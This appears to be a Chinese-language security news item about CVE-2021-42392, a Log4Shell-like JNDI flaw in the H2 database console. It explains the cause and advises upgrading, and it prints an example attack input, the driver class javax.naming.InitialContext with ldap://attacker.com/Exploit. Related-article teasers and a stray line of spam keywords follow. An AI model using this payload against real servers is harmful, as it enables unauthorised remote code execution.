<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    警告!與Log4Shell相似的Java漏洞出現了

    VSole2022-01-10 07:19:50

    安全研究人員警告稱,一個最新的嚴重的Java錯誤,其本質與目前在全球范圍內利用的臭名昭著的 Log4Shell 漏洞相同 。

    CVE-2021-42392 尚未在國家漏洞數據庫 (NVD) 中正式發布,但據軟件企業內JFrog 稱,它影響了流行的H2 Java SQL 數據庫的控制臺。

    這家安全公司提醒,任何目前運行的暴露于其 LAN 或 WAN 的 H2 控制臺的組織立即將數據庫更新到 2.0.206 版本,否則攻擊者可能會利用它進行未經身份驗證的遠程代碼執行 (RCE)。

    與 Log4Shell 一樣,該錯誤與 JNDI(Java 命名和目錄接口)“遠程類加載”有關。JNDI 是一種為 Java 應用程序提供命名和目錄功能的 API。這意味著如果攻擊者可以將惡意 URL 獲取到 JNDI 查找中,它就可以啟用 RCE。

    “簡而言之,根本原因類似于 Log4Shell——H2 數據庫框架中的多個代碼路徑將未經過濾的攻擊者控制的 URL 傳遞給 javax.naming.Context.lookup 函數,該函數允許遠程代碼庫加載(AKA Java 代碼注入 AKA遠程代碼執行),” JFrog 解釋道。

    “具體來說,org.h2.util.JdbcUtils.getConnection 方法以驅動類名和數據庫 URL 作為參數。如果驅動程序的類可分配給 javax.naming.Context 類,則該方法會從中實例化一個對象并調用其查找方法。”

    提供諸如“javax.naming.InitialContext”之類的驅動程序類和像 ldap://attacker.com/Exploit 這樣簡單的 URL 將導致遠程代碼執行。

    JFrog 表示,該漏洞特別危險,因為 H2 數據庫包特別受歡迎。該公司聲稱,它是前 50 個最受歡迎的 Maven 軟件包之一,擁有近 7000 個工件依賴項。

    但是,有一些原因導致利用不會像 Log4Shell 那樣廣泛。一方面,它具有“直接影響范圍”,這意味著易受攻擊的服務器應該更容易找到。其次,在大多數 H2 發行版中,控制臺只監聽 localhost 連接,這意味著默認設置是不可利用的。

    許多供應商可能正在運行 H2 數據庫,但沒有運行 H2 控制臺,雖然除了控制臺之外還有其他向量可以利用這個問題,但這些其他向量是依賴于上下文的,不太可能暴露給遠程攻擊者。”JFrog 補充道。

    數據庫控制臺
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    SQL 常用腳本整理
    2021-11-07 05:38:27
    常用功能腳本 1.導出整個數據庫 1mysqldump -u 用戶名 -p –default-character-set=latin1 數據庫名 > 導出的文件名(數據庫默認編碼是latin1) 2 3mysqldump -u wcnc -p smgp_apps_wcnc > wcnc.sql 2.導出一個表
    本文主要講述Dnslog這種攻擊手法在SQL注入中的實戰運用,雖然網上對于Dnslog在SQL注入方面運用的文章也不少。但是很多文章都只是片面的提到了這個攻擊方式,或者只是用某個簡單的payload做了簡單的驗證。然而在實際的運用中,因為環境的差異,利用也不同。本文詳細的記錄了在多種常見數據庫實際運用過程的一些細節,包括POC的編寫和原理,和一些網上沒有公開的利用POC。
    一個最新的嚴重的Java錯誤,其本質與Log4Shell漏洞相同。
    0x01 前期偵查 1、訪問憑證泄露 在進行信息收集時,可以收集目標的數據庫賬號密碼、云服務賬號的訪問憑證、臨時憑證、SDK 等等。 2、備份管理 在備份管理處可以看到數據庫的備份情況,可以恢復或者下載,查找數據
    在面對云數據庫場景下的攻防手法
    目前支持的功能有:爬蟲、目錄爆破、端口探測、C段探測、子域名探測、fastjson檢測、xss探測、指紋識別、漏洞掃描、漏洞告警。
    0x01 前期偵查 1、訪問憑證泄露 在信息收集階段,通過傳統攻防下的信息收集方式,收集到目標的數據庫賬戶密碼、谷歌云平臺賬戶密碼,access token、服務賬戶憑證等。 2、備份 谷歌云具有數據庫實例導出功能,可以將整個實例或實例中的數據庫導出到Cloud Storage中,其格式可以是csv或者sql。
    安全內參4月21日消息,阿里云數據庫ApsaraDB RDS for PostgreSQL 和 AnalyticDB for PostgreSQL曝出一組兩個嚴重漏洞,可用于突破租戶隔離保護機制,訪問其他客戶的敏感數據。這組漏洞被命名為BrokenSesame,在2022年12月被上報給阿里巴巴,阿里云于2023年4月12日部署了緩解措施。尚無證據表明這些漏洞曾遭到野外利用。
    可用于突破租戶隔離保護機制,訪問其他客戶的敏感數據
    近日,The Hacker News 網站披露,阿里云 ApsaraDB RDS for PostgreSQL 和 AnalyticDB for PostgreQL 數據庫爆出兩個關鍵漏洞。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类